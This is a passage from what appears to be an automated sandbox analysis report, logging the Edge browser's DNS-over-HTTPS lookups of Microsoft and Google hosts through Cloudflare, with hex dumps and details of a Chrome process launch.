                                                                                                                                                                                    2025-01-09 14:30:08 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                    2025-01-09 14:30:08 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:30:08 GMT
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                    CF-RAY: 8ff51fa1a9467290-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2025-01-09 14:30:08 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1f 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: wwwgstaticcom))


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    10192.168.2.449808172.64.41.34437040C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:30:09 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    2025-01-09 14:30:09 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 07 63 6f 70 69 6c 6f 74 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 4e 00 0c 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: copilotmicrosoftcom)NJ
                                                                                                                                                                                    2025-01-09 14:30:09 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:30:09 GMT
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                    CF-RAY: 8ff51fa79e39c413-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2025-01-09 14:30:09 UTC468INData Raw: 00 00 81 80 00 01 00 06 00 00 00 01 07 63 6f 70 69 6c 6f 74 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 0e 08 00 2d 18 63 6f 70 69 6c 6f 74 2d 63 6f 70 69 6c 6f 74 2d 6d 73 66 74 2d 63 6f 6d 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 33 00 05 00 01 00 00 00 34 00 20 07 63 6f 70 69 6c 6f 74 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 07 65 64 67 65 6b 65 79 c0 5b c0 6c 00 05 00 01 00 00 54 58 00 1a 07 65 31 30 37 31 30 38 04 64 73 63 78 0a 61 6b 61 6d 61 69 65 64 67 65 c0 5b c0 98 00 01 00 01 00 00 00 0c 00 04 17 db 52 20 c0 98 00 01 00 01 00 00 00 0c 00 04 17 db 52 5a c0 98 00 01 00 01 00 00 00 0c 00 04 17 db 52 13 00 00 29 04 d0 00 00 00 00 00 e7 00 0c 00 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: copilotmicrosoftcom-copilot-copilot-msft-comtrafficmanagernet34 copilotmicrosoftcomedgekey[lTXe107108dscxakamaiedge[R RZR)


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    11192.168.2.449807172.64.41.34437040C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:30:09 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    2025-01-09 14:30:09 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 07 63 6f 70 69 6c 6f 74 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 4e 00 0c 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: copilotmicrosoftcomA)NJ
                                                                                                                                                                                    2025-01-09 14:30:09 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:30:09 GMT
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                    CF-RAY: 8ff51fa79d8142c3-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2025-01-09 14:30:09 UTC468INData Raw: 00 00 81 80 00 01 00 03 00 01 00 01 07 63 6f 70 69 6c 6f 74 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0d e4 00 2d 18 63 6f 70 69 6c 6f 74 2d 63 6f 70 69 6c 6f 74 2d 6d 73 66 74 2d 63 6f 6d 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 33 00 05 00 01 00 00 00 10 00 20 07 63 6f 70 69 6c 6f 74 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 07 65 64 67 65 6b 65 79 c0 5b c0 6c 00 05 00 01 00 00 54 34 00 1a 07 65 31 30 37 31 30 38 04 64 73 63 78 0a 61 6b 61 6d 61 69 65 64 67 65 c0 5b c0 a0 00 06 00 01 00 00 03 bc 00 31 06 6e 30 64 73 63 78 c0 a5 0a 68 6f 73 74 6d 61 73 74 65 72 06 61 6b 61 6d 61 69 c0 1e 67 7f dd 3f 00 00 03 e8 00 00 03 e8 00 00 03 e8 00 00 07 08 00 00 29 04 d0 00 00 00 00 00 da 00 0c 00 d6 00
                                                                                                                                                                                    Data Ascii: copilotmicrosoftcomA-copilot-copilot-msft-comtrafficmanagernet3 copilotmicrosoftcomedgekey[lT4e107108dscxakamaiedge[1n0dscxhostmasterakamaig?)


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    12192.168.2.449812172.64.41.34437040C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:30:10 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    2025-01-09 14:30:10 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 16 73 74 75 64 69 6f 73 74 61 74 69 63 61 73 73 65 74 73 70 72 6f 64 09 61 7a 75 72 65 65 64 67 65 03 6e 65 74 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 3f 00 0c 00 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: studiostaticassetsprodazureedgenet)?;
                                                                                                                                                                                    2025-01-09 14:30:10 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:30:10 GMT
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                    CF-RAY: 8ff51faa795a0f6f-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2025-01-09 14:30:10 UTC468INData Raw: 00 00 81 80 00 01 00 06 00 00 00 01 16 73 74 75 64 69 6f 73 74 61 74 69 63 61 73 73 65 74 73 70 72 6f 64 09 61 7a 75 72 65 65 64 67 65 03 6e 65 74 00 00 01 00 01 c0 0c 00 05 00 01 00 00 07 05 00 1d 16 73 74 75 64 69 6f 73 74 61 74 69 63 61 73 73 65 74 73 70 72 6f 64 03 61 66 64 c0 23 c0 42 00 05 00 01 00 00 00 39 00 0f 0c 72 65 73 65 72 76 65 64 2d 70 30 31 c0 59 c0 6b 00 05 00 01 00 00 00 39 00 1a 08 73 74 61 72 2d 74 2d 70 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 c0 2d c0 86 00 05 00 01 00 00 00 39 00 2c 04 73 68 65 64 08 64 75 61 6c 2d 6c 6f 77 0b 73 2d 70 61 72 74 2d 30 30 31 32 06 74 2d 30 30 30 39 08 74 2d 6d 73 65 64 67 65 c0 2d c0 ac 00 05 00 01 00 00 00 39 00 02 c0 ba c0 ba 00 01 00 01 00 00 00 39 00 04 0d 6b f6 28 00 00 29 04 d0 00 00 00 00
                                                                                                                                                                                    Data Ascii: studiostaticassetsprodazureedgenetstudiostaticassetsprodafd#B9reserved-p01Yk9star-t-ptrafficmanager-9,sheddual-lows-part-0012t-0009t-msedge-99k()


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    13192.168.2.449811172.64.41.34437040C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:30:10 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    2025-01-09 14:30:10 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 16 73 74 75 64 69 6f 73 74 61 74 69 63 61 73 73 65 74 73 70 72 6f 64 09 61 7a 75 72 65 65 64 67 65 03 6e 65 74 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 3f 00 0c 00 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: studiostaticassetsprodazureedgenetA)?;
                                                                                                                                                                                    2025-01-09 14:30:10 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:30:10 GMT
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                    CF-RAY: 8ff51faa78cb7c7e-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2025-01-09 14:30:10 UTC468INData Raw: 00 00 81 80 00 01 00 04 00 01 00 01 16 73 74 75 64 69 6f 73 74 61 74 69 63 61 73 73 65 74 73 70 72 6f 64 09 61 7a 75 72 65 65 64 67 65 03 6e 65 74 00 00 41 00 01 c0 0c 00 05 00 01 00 00 06 9e 00 1d 16 73 74 75 64 69 6f 73 74 61 74 69 63 61 73 73 65 74 73 70 72 6f 64 03 61 66 64 c0 23 c0 42 00 05 00 01 00 00 00 2a 00 0f 0c 72 65 73 65 72 76 65 64 2d 70 30 31 c0 59 c0 6b 00 05 00 01 00 00 00 2a 00 1a 08 73 74 61 72 2d 74 2d 70 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 c0 2d c0 86 00 05 00 01 00 00 00 2a 00 2c 04 73 68 65 64 08 64 75 61 6c 2d 6c 6f 77 0b 73 2d 70 61 72 74 2d 30 30 31 32 06 74 2d 30 30 30 39 08 74 2d 6d 73 65 64 67 65 c0 2d c0 cd 00 06 00 01 00 00 00 2a 00 30 03 6e 73 31 c0 cd 06 6d 73 6e 68 73 74 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d
                                                                                                                                                                                    Data Ascii: studiostaticassetsprodazureedgenetAstudiostaticassetsprodafd#B*reserved-p01Yk*star-t-ptrafficmanager-*,sheddual-lows-part-0012t-0009t-msedge-*0ns1msnhstmicrosoftcom


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    14192.168.2.449809172.64.41.34437040C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:30:11 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    2025-01-09 14:30:11 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 10 65 64 67 65 61 73 73 65 74 73 65 72 76 69 63 65 09 61 7a 75 72 65 65 64 67 65 03 6e 65 74 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 45 00 0c 00 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: edgeassetserviceazureedgenet)EA
                                                                                                                                                                                    2025-01-09 14:30:11 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:30:11 GMT
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                    CF-RAY: 8ff51fb10b7e4376-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2025-01-09 14:30:11 UTC468INData Raw: 00 00 81 80 00 01 00 05 00 00 00 01 10 65 64 67 65 61 73 73 65 74 73 65 72 76 69 63 65 09 61 7a 75 72 65 65 64 67 65 03 6e 65 74 00 00 01 00 01 c0 0c 00 05 00 01 00 00 06 58 00 17 10 65 64 67 65 61 73 73 65 74 73 65 72 76 69 63 65 03 61 66 64 c0 1d c0 3c 00 05 00 01 00 00 0d 60 00 22 10 61 7a 75 72 65 65 64 67 65 2d 74 2d 70 72 6f 64 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 c0 27 c0 5f 00 05 00 01 00 00 00 3c 00 2c 04 73 68 65 64 08 64 75 61 6c 2d 6c 6f 77 0b 73 2d 70 61 72 74 2d 30 30 31 32 06 74 2d 30 30 30 39 08 74 2d 6d 73 65 64 67 65 c0 27 c0 8d 00 05 00 01 00 00 00 3c 00 02 c0 9b c0 9b 00 01 00 01 00 00 00 3c 00 04 0d 6b f6 28 00 00 29 04 d0 00 00 00 00 00 f2 00 0c 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: edgeassetserviceazureedgenetXedgeassetserviceafd<`"azureedge-t-prodtrafficmanager'_<,sheddual-lows-part-0012t-0009t-msedge'<<k()


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    15192.168.2.449810172.64.41.34437040C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:30:11 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    2025-01-09 14:30:11 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 10 65 64 67 65 61 73 73 65 74 73 65 72 76 69 63 65 09 61 7a 75 72 65 65 64 67 65 03 6e 65 74 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 45 00 0c 00 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: edgeassetserviceazureedgenetA)EA
                                                                                                                                                                                    2025-01-09 14:30:11 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:30:11 GMT
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                    CF-RAY: 8ff51fb10b4e439a-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2025-01-09 14:30:11 UTC468INData Raw: 00 00 81 80 00 01 00 03 00 01 00 01 10 65 64 67 65 61 73 73 65 74 73 65 72 76 69 63 65 09 61 7a 75 72 65 65 64 67 65 03 6e 65 74 00 00 41 00 01 c0 0c 00 05 00 01 00 00 06 f3 00 17 10 65 64 67 65 61 73 73 65 74 73 65 72 76 69 63 65 03 61 66 64 c0 1d c0 3c 00 05 00 01 00 00 0d fb 00 22 10 61 7a 75 72 65 65 64 67 65 2d 74 2d 70 72 6f 64 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 c0 27 c0 5f 00 05 00 01 00 00 00 27 00 2c 04 73 68 65 64 08 64 75 61 6c 2d 6c 6f 77 0b 73 2d 70 61 72 74 2d 30 30 31 32 06 74 2d 30 30 30 39 08 74 2d 6d 73 65 64 67 65 c0 27 c0 ae 00 06 00 01 00 00 00 27 00 30 03 6e 73 31 c0 ae 06 6d 73 6e 68 73 74 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 78 3a 8c fd 00 00 07 08 00 00 03 84 00 24 ea 00 00 00 00 3c 00 00 29 04 d0 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: edgeassetserviceazureedgenetAedgeassetserviceafd<"azureedge-t-prodtrafficmanager'_',sheddual-lows-part-0012t-0009t-msedge''0ns1msnhstmicrosoftcomx:$<)


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    16192.168.2.449836172.64.41.34437040C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:30:26 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    2025-01-09 14:30:26 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 51 00 0c 00 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: edgemicrosoftcomA)QM
                                                                                                                                                                                    2025-01-09 14:30:26 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:30:26 GMT
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                    CF-RAY: 8ff5200d98ee433d-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2025-01-09 14:30:26 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 01 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0d 65 00 2d 12 65 64 67 65 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 0b 64 75 61 6c 2d 61 2d 30 30 33 36 08 61 2d 6d 73 65 64 67 65 03 6e 65 74 00 c0 4f 00 06 00 01 00 00 00 45 00 23 03 6e 73 31 c0 4f 06 6d 73 6e 68 73 74 c0 11 78 2b 22 e5 00 00 07 08 00 00 03 84 00 24 ea 00 00 00 00 f0 00 00 29 04 d0 00 00 00 00 01 3d 00 0c 01 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: edgemicrosoftcomAe-edge-microsoft-comdual-a-0036a-msedgenetOE#ns1Omsnhstx+"$)=9


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    17192.168.2.449837172.64.41.34437040C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:30:26 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    2025-01-09 14:30:26 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 51 00 0c 00 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: edgemicrosoftcom)QM
                                                                                                                                                                                    2025-01-09 14:30:26 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:30:26 GMT
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                    CF-RAY: 8ff5200dab6e429d-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2025-01-09 14:30:26 UTC468INData Raw: 00 00 81 80 00 01 00 04 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 0d d7 00 2d 12 65 64 67 65 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 0b 64 75 61 6c 2d 61 2d 30 30 33 36 08 61 2d 6d 73 65 64 67 65 03 6e 65 74 00 c0 30 00 05 00 01 00 00 00 b7 00 18 0b 64 75 61 6c 2d 61 2d 30 30 33 36 09 64 63 2d 6d 73 65 64 67 65 c0 58 c0 69 00 01 00 01 00 00 00 b7 00 04 0d 6b 16 ef c0 69 00 01 00 01 00 00 00 b7 00 04 83 fd 21 ef 00 00 29 04 d0 00 00 00 00 01 28 00 0c 01 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: edgemicrosoftcom-edge-microsoft-comdual-a-0036a-msedgenet0dual-a-0036dc-msedgeXiki!)($


                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                    Start time:09:29:27
                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                    Start time:09:29:32
